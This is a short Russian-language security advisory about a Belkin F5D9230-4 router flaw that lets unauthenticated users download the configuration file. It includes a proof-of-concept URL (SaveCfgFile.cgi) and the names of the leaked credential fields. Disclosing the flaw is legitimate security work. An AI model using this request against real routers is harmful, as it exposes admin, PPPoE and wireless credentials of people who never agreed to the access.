Программа: Belkin Wireless G Plus MIMO Router F5D9230-4

Уязвимость позволяет удаленному злоумышленнику обойти ограничения
безопасности на целевой системе. Уязвимость существует из-за ошибки, позволяющей
получить доступ к некоторым cgi скриптам без аутентификации в системе.
Эксплуатирование уязвимости позволит получить такие данные как имя и пароль
пользователя PPP, имя и пароль пользователя администратора, WAP ключи и другие.

Пример:

Получение конфигурационного файла:

http://<ROUTER_IP>/SaveCfgFile.cgi

pppoe_username=...
pppoe_password=...
wl0_pskkey=...
wl0_key1=...
mradius_password=...
mradius_secret=...
httpd_password=...
http_passwd=...
pppoe_passwd=...

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии